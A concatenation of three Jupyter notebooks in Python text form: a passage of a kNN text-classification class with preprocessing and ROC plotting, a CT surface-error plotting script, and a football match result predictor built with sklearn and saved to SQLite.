cv_fold_score.append(model.score(X_cv,Y_cv)) train_fold_score.append(model.score(X_train,Y_train)) auroc_fold_score_proba.append(roc_auc_score(Y_cv,y_cv_pred_proba)) auroc_fold_score.append(roc_auc_score(Y_cv,y_cv_pred)) auroc_fold_train.append(roc_auc_score(Y_train,model.predict_proba(X_train)[:,1])) scrs.append([n,mean(cv_fold_score),mean(train_fold_score),mean(auroc_fold_score),mean(auroc_fold_score_proba)]) auroc_score[n] = mean(auroc_fold_score_proba) self.roc_auc_stats.append([n,mean(auroc_fold_train),stdev(auroc_fold_train),mean(auroc_fold_score_proba),stdev(auroc_fold_score_proba)]) max_roc_score = max(auroc_score.values()) scrs = pd.DataFrame(data = scrs,columns=['K','CV score','Train score','AUROC','AUROC with probability']) optimal_k = max(auroc_score, key=auroc_score.get) self.max_roc_score = max_roc_score self.scrs = scrs self.optimal_k = optimal_k self.op_model = KNeighborsClassifier(n_neighbors = optimal_k,algorithm = self.algorithm) self.X_train_n_cv,self.X_test = self.vectorize(self.X_train_n_cv,self.X_test,self.textPreprocessing) self.op_model.fit(self.X_train_n_cv,self.Y_train_n_cv) return self.op_model def recent_score(self): return self.op_model.score(self.X_test,self.Y_test) def Scale(self): sc = StandardScaler() if (self.type==1): self.X_train_n_cv = pd.DataFrame(sc.fit_transform(self.X_train_n_cv),index=self.X_train_n_cv.index) self.X_test = pd.DataFrame(sc.transform(self.X_test),index=self.X_test.index) else: self.X_train_n_cv = sc.fit_transform(self.X_train_n_cv) self.X_test = sc.transform(self.X_test) def Plot_roc(self): y_probability = self.op_model.predict_proba(self.X_test) fpr, tpr, threshold = roc_curve(self.Y_test, y_probability[:,1]) roc_auc = roc_auc_score(self.Y_test, y_probability[:,1]) plt.title('Receiver Operating Characteristic Test data') plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc) plt.legend(loc = 'lower right') plt.plot([0, 1], [0, 1],'r--') plt.xlim([0, 1]) plt.ylim([0, 1]) plt.ylabel('True Positive Rate') plt.xlabel('False Positive Rate') plt.title('ROC Curve of kNN') plt.show() def Plot_CV_roc_score(self): rocstats = np.array(self.roc_auc_stats) sns.set_style("darkgrid") sns.set_palette(sns.color_palette("Dark2", 2)) sns.lineplot(y=rocstats[:,1],x=rocstats[:,0],label = "Train AUROC") sns.lineplot(y=rocstats[:,3],x=rocstats[:,0],label = "CV AUROC") plt.fill_between(x=rocstats[:,0],y1=rocstats[:,3]+rocstats[:,4],y2=rocstats[:,3]-rocstats[:,4],color="#ffd1b3") plt.fill_between(x=rocstats[:,0],y1=rocstats[:,1]+rocstats[:,2],y2=rocstats[:,1]-rocstats[:,2],color="#B4EEB4") plt.title("ROC score of Train and CV data set with it's spanning standard deviation") plt.ylabel('ROC score') plt.xlabel('K as hyperparameter') def Plot_CV_scrs(self): trn_err = self.scrs['Train score'].apply(lambda x: 1-x,1) cv_err = self.scrs['CV score'].apply(lambda x: 1-x,1) sns.lineplot(y='CV score',x='K',data=self.scrs) sns.lineplot(y='Train score',x='K',data=self.scrs) fig = plt.figure() sns.lineplot(y=cv_err,x='K',data=self.scrs) sns.lineplot(y=trn_err,x='K',data=self.scrs) def Confusion_mat(self): plot_confusion_matrix(self.op_model, self.X_train_n_cv, self.Y_train_n_cv) plot_confusion_matrix(self.op_model, self.X_test, self.Y_test) plt.show() def Balance(self): ubal_data = pd.DataFrame(self.X) ubal_data['Y'] = self.Y ubal_mino = ubal_data[ubal_data['Y']==0].copy() ubal_majo = ubal_data[ubal_data['Y']==1].copy() ubal_mino_balanced = resample(ubal_mino,replace=True,n_samples=ubal_majo.shape[0],random_state=123) ubal_balanced = pd.concat([ubal_majo, ubal_mino_balanced]) self.X = np.array(ubal_balanced.iloc[:,:-1]) self.Y = np.array(ubal_balanced['Y']) return ubal_balanced def cln_html(self,sen): clnd = re.sub(r'<.*?>',r' ',sen) return clnd def cln_punc(self,sen): clnd = re.sub(r'[?|!|\'|"|#]',r'',sen) clnd = re.sub(r'[.|,|)|(|\|/]',r' ',clnd) return clnd def text_preprocessing1(self,textdata): stop = set(stopwords.words('english')) sno = nltk.stem.SnowballStemmer('english') i=0 str1=' ' final_string=[] s='' for sent in textdata: filtered_sentence=[] sent=self.cln_html(sent) for w in sent.split(): for cleaned_words in self.cln_punc(w).split(): if((cleaned_words.isalpha()) & (len(cleaned_words)>2)): if(cleaned_words.lower() not in stop): s=(sno.stem(cleaned_words.lower())).encode('utf8') filtered_sentence.append(s) else: continue else: continue str1 = b" ".join(filtered_sentence) final_string.append(str1) i+=1 return final_string def text_preprocessing2(self,textdata): list_of_sent=[] for sent in textdata: filtered_sentence=[] sent=self.cln_html(sent) for w in sent.split(): for cleaned_words in self.cln_punc(w).split(): if(cleaned_words.isalpha()): filtered_sentence.append(cleaned_words.lower()) else: continue list_of_sent.append(filtered_sentence) return list_of_sent def text_preprocessing3(self,textdata): text1 = self.text_preprocessing1(textdata) text2 = self.text_preprocessing2(textdata) x = pd.DataFrame({'BOW':text1,'TFIDF':text2}) return x.to_numpy() def vectorize(self,traindata,testdata,kind): if(self.istext==1): traindata = pd.DataFrame(traindata) testdata = pd.DataFrame(testdata) if(kind=='BOW'): bow = CountVectorizer(ngram_range=(1,2),max_features=500) train_bow = bow.fit_transform(pd.Series(traindata.iloc[:,0])) test_bow = bow.transform(pd.Series(testdata.iloc[:,0])) return train_bow,test_bow ############################################################################## elif(kind=='TFIDF'): tf_idf=TfidfVectorizer(ngram_range=(1,2),max_features=500) train_tdidf=tf_idf.fit_transform(pd.Series(traindata.iloc[:,0])) test_tdidf=tf_idf.transform(pd.Series(testdata.iloc[:,0])) return train_tdidf,test_tdidf ############################################################################## elif(kind=='AVG-W2V'): w2v_model=gensim.models.Word2Vec(pd.Series(traindata.iloc[:,0]),min_count=5,size=50, workers=4) i=0 train_vectors = []; for sent in pd.Series(traindata.iloc[:,0]): sent_vec = np.zeros(50) cnt_words =0; for word in sent: try: vec = w2v_model.wv[word] sent_vec += vec cnt_words += 1 i=i+1 except: pass sent_vec /= cnt_words train_vectors.append(sent_vec) i=0 test_vectors = []; for sent in pd.Series(testdata.iloc[:,0]): sent_vec = np.zeros(50) cnt_words =0; for word in sent: try: vec = w2v_model.wv[word] sent_vec += vec cnt_words += 1 i=i+1 except: pass sent_vec /= cnt_words test_vectors.append(sent_vec) return train_vectors,test_vectors ############################################################################## elif(kind=='TFIDF-W2V'): w2v_model=gensim.models.Word2Vec(pd.Series(traindata.iloc[:,1]),min_count=5,size=50, workers=4) tf_idf=TfidfVectorizer(max_features=500) tf_idf_vec = tf_idf.fit_transform(pd.Series(traindata.iloc[:,0])) tfidf_feat = tf_idf.get_feature_names() tf_idf_vec2 = tf_idf.transform(pd.Series(testdata.iloc[:,0])) train_vectors = [] row=0 for sent in pd.Series(traindata.iloc[:,1]): sent_vec = np.zeros(50) weight_sum =0 for word in sent: try: vec = w2v_model.wv[word] tfidf = tf_idf_vec[row, tfidf_feat.index(word)] sent_vec += (vec * tfidf) weight_sum += tfidf except: pass sent_vec /= weight_sum train_vectors.append(sent_vec) row += 1 train_df=pd.DataFrame(train_vectors) train_df.fillna(train_df.mean(),inplace=True) test_vectors = [] row=0 for sent in pd.Series(testdata.iloc[:,1]): sent_vec = np.zeros(50) weight_sum =0 for word in sent: try: vec = w2v_model.wv[word] tfidf = tf_idf_vec2[row, tfidf_feat.index(word)] sent_vec += (vec * tfidf) weight_sum += tfidf except: pass sent_vec /= weight_sum test_vectors.append(sent_vec) row += 1 test_df=pd.DataFrame(test_vectors) test_df.fillna(test_df.mean(),inplace=True) # test_df.dropna(inplace=True) # print(test_df.shape) return train_df,test_df else: return traindata,testdata else: return traindata,testdata # + tags=[] knn = Knn(cus_data.iloc[23000:25000,9],cus_data.iloc[23000:25000,6],balance=1,scale=0,istext=1,textPreprocessing='TFIDF-W2V') # knn = Knn(cus_data.iloc[22000:25000,9],cus_data.iloc[22000:25000,6],balance=1,scale=0) # + tags=[] knn.KNN_KCV(hyper=list(range(1,100,10))) # - knn.recent_score() knn.Confusion_mat() knn.Plot_CV_roc_score() knn.Plot_CV_scrs() pd.DataFrame(bow.toarray()) tet = knn.Balance() # + tags=[] knn.KNN_TS() # - knn.op_model.score(knn.X_test,knn.Y_test) knn.Plot_CV_scrs() # knn = Knn(tdifd_weighted_w2v,Scr[0:1000]) knn = Knn(avg_w2v[11000:12000],Scr[11000:12000]) # - ### Trying out diff. folds in kfold-cv. # + tags=[] omodel = knn.KNN_KCV() # - knn.Plot_CV_roc_score() # + tags=[] scores,auc,ok = knn.KNN_KCV(5) # - knn.Plot_scrs() # + tags=[] scores,auc,ok = knn.KNN_KCV(20) # - knn.Plot_scrs() # - Here we are doing gridsearch on Knn with the balanced data set (this was befor when we added the Balance() function in our KNN class) x1,x2,y1,y2 = train_test_split(df_upsampled.iloc[:,:50],df_upsampled.iloc[:,50],test_size=0.3,random_state=0) clf = GridSearchCV(estimator=KNeighborsClassifier(),param_grid={'n_neighbors':list(range(1,100,3))},cv=10) clf.fit(x1,y1) clf.best_estimator_ clf.cv_results_; plot_confusion_matrix(clf.best_estimator_,x2,y2) compute_class_weight(class_weight = 'balanced',classes=[0,1],y=Scr[11000:12000]) # - ### This is testing different accuracies for different datasets(diff. portions of datasets) and diff. 'n' in knn. # + tags=[] for i in tqdm([1,10**1,10**2,10**3]): cvscr = cross_val_score(KNeighborsClassifier(i),avg_w2v[10000:20000],Scr[10000:20000],cv=5) print(cvscr.mean()) # + tags=[] k_lst = range(1,1000,100) for i in tqdm(k_lst): cvscr = cross_val_score(KNeighborsClassifier(i),avg_w2v[10000:20000],Scr[10000:20000],cv=5) print(cvscr.mean()) # + tags=[] for i in tqdm([1,10**1,10**2,10**3]): cvscr = cross_val_score(KNeighborsClassifier(i),affr_bow_500[10000:15000],Scr[10000:15000],cv=5) print(cvscr.mean()) # + tags=[] k_lst = range(1,400,50) for i in tqdm(k_lst): cvscr = cross_val_score(KNeighborsClassifier(i),avg_w2v[10000:13000],Scr[10000:13000],cv=5) print(cvscr.mean()) # + tags=[] for i in tqdm([1,10**1,10**2,10**3]): cvscr = cross_val_score(KNeighborsClassifier(i),affr_ngram_tfidf_500[10000:20000],Scr[10000:20000],cv=5) print(cvscr.mean()) # + tags=[] k_lst = range(1,400,50) for i in tqdm(k_lst): cvscr = cross_val_score(KNeighborsClassifier(i),affr_ngram_tfidf_500[10000:13000],Scr[10000:13000],cv=5) print(cvscr.mean()) # - # - ### Implementing knn for the data set by <NAME>. kdata= pd.read_csv('../datafiles/knn_keril.csv') kdata['Purchased'].value_counts() kknn = Knn(kdata.iloc[:,:2],kdata.iloc[:,2],balance=0,scale=1) # + tags=[] kknn.KNN_KCV() # - kknn.recent_score() # + tags=[] kknn.KNN_TS(hyper=list(range(1,50)),balance=0,scale=1) # - kknn.recent_score() # > This analysis si from the kknn.KNN_KCV model kknn.Plot_CV_scrs() kknn.Plot_CV_roc_score() kknn.Plot_roc() kknn.Confusion_mat()
ML Notebooks/AFFR_KNN.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python tf>=2.0 # language: python # name: tf2gpu # --- # ## Surface Determination Workflow import numpy as np import matplotlib.pyplot as plt import os import h5py import sys import pandas as pd import seaborn as sns sns.set_style(style = 'darkgrid') sns.set(font_scale = 1.2) psize = (16,16,16) size_lab = '16x16' pixel_size = 1.51 df = pd.read_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/morpho_resolution.csv') # df df['radius-um'] = pixel_size*df['radius'] fig, ax = plt.subplots(1,1,figsize = (8,6)) z = np.polyfit(df['iou'], np.abs(df['radius-um']), 1) p = np.poly1d(z) ax.scatter(df['iou'], np.abs(df['radius-um'])) iou_vals = np.linspace(min(df['iou']), max(df['iou']),10) ax.plot(iou_vals, p(iou_vals), '--') ax.set_xlabel('IoU accuracy') ax.set_ylabel('surface error (${\mu}m$)') # ## IoU vs X df = pd.read_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/stats.csv') se = 'surface-error (${\mu}m$)' df[se] = p(np.asarray(df['IoU'])) df = df[df['SURF-model'] == 3] # + fig, ax = plt.subplots(1,1,figsize = (8,6)) df[df['CT-algo'] == 'FDK'].plot.scatter(x = 'X', y = se, c = 'red', marker = 'x', ax = ax, s= 30, label = 'FDK') z = np.polyfit(df[df['CT-algo'] == 'FDK']['X'], df[df['CT-algo'] == 'FDK'][se], 1) p = np.poly1d(z) x_vals = np.linspace(1,10,10,endpoint=True) ax.plot(x_vals, p(x_vals), '--') df[(df['CT-algo'] == 'DR')].plot.scatter(x = 'X', y = se, c = 'blue', marker = 'o', ax = ax, s= 30, label = 'DR') z = np.polyfit(df[df['CT-algo'] == 'DR']['X'], df[df['CT-algo'] == 'DR'][se], 1) p = np.poly1d(z) x_vals = np.linspace(1,10,10,endpoint=True) ax.plot(x_vals, p(x_vals), '--') ax.legend() ax.set_xlabel("X - reduction in scan time") # - df # + # df.to_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/stats_all.csv') # - #
scratchpad/surface_determination/notebooks/make_plots.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # ## Football Predictor Model # In this notebook we develop a football match result predictor from scratch with sklearn library, testing differents models and compare performance of each one. # The idea is then use this model for a more complex system, create a API Rest # ## Load, clean and Transform data import numpy as np import matplotlib.pyplot as plt from matplotlib.ticker import NullFormatter import pandas as pd import numpy as np import matplotlib.ticker as ticker from sklearn import preprocessing from sklearn import metrics df = pd.read_csv('dataset.csv') df.head() df['result'] = df.apply(lambda x : 'wins' if x.home_score > x.away_score else 'loses' if x.home_score < x.away_score else 'draws', axis=1) df.head() # dic = eval(df['home_team'].values) teams = list(dict.fromkeys(df['home_team'].values.tolist() + df['away_team'].values.tolist())) dic = { teams[i] : (i+1) for i in range(len(teams)) } df['home_team_id']= df['home_team'].map(dic) df['away_team_id']= df['away_team'].map(dic) df.head() X = df[ ['home_team_id', 'away_team_id'] ].values X[0:5] y = df['result'].values y[0:5] # + from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split( X, y, test_size=0.2, random_state=4) print ('Train set:', X_train.shape, y_train.shape) print ('Test set:', X_test.shape, y_test.shape) classifier = [] accuracy = [] # - # ## Compare classifiers # + from sklearn.neighbors import KNeighborsClassifier MAX_K = 50 mean_acc = np.zeros((MAX_K-1)) std_acc = np.zeros((MAX_K-1)) ConfustionMx = []; for n in range(1,MAX_K): #Train Model model = KNeighborsClassifier(n_neighbors = n).fit(X_train,y_train) # Predict yhat = model.predict(X_test) # Measure accuracy from model with K = n mean_acc[n-1] = metrics.accuracy_score(y_test, yhat) std_acc[n-1]=np.std(yhat==y_test)/np.sqrt(yhat.shape[0]) # Now I plot results and choose the best K plt.plot(range(1,MAX_K),mean_acc,'g') plt.fill_between(range(1,MAX_K),mean_acc - 1 * std_acc,mean_acc + 1 * std_acc, alpha=0.10) plt.legend(('Accuracy ', '+/- 3xstd')) plt.ylabel('Accuracy ') plt.xlabel('Number of Nabors (K)') plt.tight_layout() plt.show() print( "The best accuracy was with", mean_acc.max(), "with k=", mean_acc.argmax()+1) KNN_K = mean_acc.argmax()+1 KNN = KNeighborsClassifier(n_neighbors = KNN_K).fit(X_train,y_train) classifier.append("KNeighborsClassifier") accuracy.append(mean_acc.max()) # + from sklearn.tree import DecisionTreeClassifier MAX_DEPTH = 50 mean_acc = np.zeros((MAX_K-1)) std_acc = np.zeros((MAX_K-1)) ConfustionMx = []; for n in range(1,MAX_DEPTH): #Train Model model = DecisionTreeClassifier(criterion="entropy", max_depth = n).fit(X_train,y_train) # Predict yhat = model.predict(X_test) # Measure accuracy from model with depth = n mean_acc[n-1] = metrics.accuracy_score(y_test, yhat) std_acc[n-1]=np.std(yhat==y_test)/np.sqrt(yhat.shape[0]) # Now I plot results and choose the best K plt.plot(range(1,MAX_DEPTH),mean_acc,'g') plt.fill_between(range(1,MAX_DEPTH),mean_acc - 1 * std_acc,mean_acc + 1 * std_acc, alpha=0.10) plt.legend(('Accuracy ', '+/- 3xstd')) plt.ylabel('Accuracy ') plt.xlabel('Max depth (K)') plt.tight_layout() plt.show() print( "The best accuracy was with", mean_acc.max(), "with depth=", mean_acc.argmax()+1) DT_DEPTH = mean_acc.argmax()+1 DT = DecisionTreeClassifier(criterion="entropy", max_depth = DT_DEPTH).fit(X_train,y_train) classifier.append("DecisionTreeClassifier") accuracy.append(mean_acc.max()) # + from sklearn.linear_model import LogisticRegression MAX_C = 50 logloss_liblinear = np.zeros((MAX_C-1)) mean_acc_liblinear = np.zeros((MAX_C-1)) for n in range(1,MAX_C): #Train Model lr = LogisticRegression(C=(n/100), solver='liblinear').fit(X_train,y_train) # Predict yhat = lr.predict(X_test) # Measure accuracy from model with C = n # logloss_liblinear[n-1] = log_loss(y_test, yhat) mean_acc_liblinear[n-1] = metrics.accuracy_score(y_test, yhat) logloss_sag = np.zeros((MAX_C-1)) mean_acc_sag = np.zeros((MAX_C-1)) std_acc_sag = np.zeros((MAX_C-1)) for n in range(1,MAX_C): #Train Model lr = LogisticRegression(C=(n/100), solver='sag').fit(X_train,y_train) # Predict yhat = lr.predict(X_test) # Measure accuracy from model with C = n # logloss_sag[n-1] = log_loss(y_test, yhat) mean_acc_sag[n-1] = metrics.accuracy_score(y_test, yhat) std_acc_sag[n-1]=np.std(yhat==y_test)/np.sqrt(yhat.shape[0]) # Now I plot results and choose the best model plt.plot(range(1,MAX_C),mean_acc_liblinear,'g') plt.plot(range(1,MAX_C),mean_acc_sag,'b') plt.legend(('liblinear ', 'sag')) plt.ylabel('Accuracy ') plt.xlabel('Regularization (C)') plt.tight_layout() plt.show() print( "The best accuracy liblinear was with", mean_acc_liblinear.max(), "with C=", (mean_acc_liblinear.argmax()+1)/100) print( "The best accuracy sag was with", mean_acc_sag.max(), "with C=", (mean_acc_sag.argmax()+1)/100) classifier.append("LogisticRegression") accuracy.append(mean_acc_liblinear.max()) # + from sklearn.ensemble import RandomForestClassifier RF = RandomForestClassifier(n_estimators = 200, random_state = 1, class_weight = 'balanced') RF.fit(X_train,y_train) yhat = RF.predict(X_test) mean_acc = metrics.accuracy_score(y_test, yhat) print( "Accuracy RandomForest was", mean_acc) classifier.append("RandomForestClassifier") accuracy.append(mean_acc) # + from sklearn.ensemble import AdaBoostClassifier AB = AdaBoostClassifier(n_estimators = 200, random_state = 2) AB.fit(X_train,y_train) yhat = AB.predict(X_test) mean_acc = metrics.accuracy_score(y_test, yhat) print( "Accuracy AdaBoost was", mean_acc) classifier.append("AdaBoostClassifier") accuracy.append(mean_acc) # + from sklearn.naive_bayes import GaussianNB GNB = GaussianNB() GNB.fit(X_train,y_train) yhat = GNB.predict(X_test) mean_acc = metrics.accuracy_score(y_test, yhat) print( "Accuracy GaussianNB was", mean_acc) classifier.append("GaussianNB") accuracy.append(mean_acc) # + import matplotlib.pyplot as plt; plt.rcdefaults() import numpy as np import matplotlib.pyplot as plt y_pos = np.arange(len(classifier)) plt.barh(y_pos, accuracy, align='center', alpha=0.5) plt.yticks(y_pos, classifier) plt.xlabel('Accuracy') plt.title('Classifier type') # - # Based on resultds we adapt the following classifier for our footbal predictor model: model = AdaBoostClassifier(n_estimators = 200, random_state = 2).fit(X_train,y_train) # ## Test our model # Is time to test our model, we first test it in an scenario that never occurs, football match between Argentina and Galicia. # <br> We expect to Argentina wins this match :) index = df.index[((df['home_team'] == 'Argentina') & (df['away_team'] == 'Galicia')) | (df['home_team'] == 'Galicia') & (df['away_team'] == 'Argentina') ].tolist() index # We just verify that in our model this match never occurs. # <br> It is time to play our virtual match! home_team = dic['Argentina'] away_team = dic['Galicia'] print("Argentina team idx", home_team) print("Galicia team idx", away_team) x1 = [[home_team,away_team]] yhat = model.predict(x1) yhat # Argentina wins! Now we could try with another example more realistic home_team = dic['Paraguay'] away_team = dic['Argentina'] x1 = [[home_team,away_team]] yhat = model.predict(x1) yhat # ## Save model and schema # In this part we are goint to save our model for future use and save the schema dictionary that we have use to test our model from sklearn.externals import joblib import sqlite3 # Save model joblib.dump(model, 'football_predictor_model.pkl') # Create schema conn = sqlite3.connect('football.db') # The database will be saved in the location where your 'py' file is saved c = conn.cursor() c.execute(''' DROP TABLE IF EXISTS results; ''') c.execute(''' DROP TABLE IF EXISTS teams; ''') c.execute('''CREATE TABLE teams( [id] INTEGER PRIMARY KEY NOT NULL, [country] TEXT NOT NULL ) ''') c.execute('''CREATE TABLE results( [home_team_id] INTEGER REFERENCES teams(id) NOT NULL, [away_team_id] INTEGER REFERENCES teams(id) NOT NULL, [home_score] INTEGER NOT NULL, [away_score] INTEGER NOT NULL, [result] TEXT NOT NULL ) ''') # Save dictionary teams = pd.DataFrame(dic.items(), columns=['country', 'id']) teams.head() teams.to_sql('teams', conn, if_exists='replace', index = False) # Save results results = df[ ['home_team_id', 'away_team_id', 'home_score', 'away_score', 'result'] ] results.head() results.to_sql('results', conn, if_exists='replace', index = False) # ## Conclusion # There is a lot of optimization work for this football model, it needs more feature to get better performance. # <br> The idea was compare different classifiers and get a model to use in future works # <br> Next....this model will be use in a API Rest to get your own predictions.
football_predictor.ipynb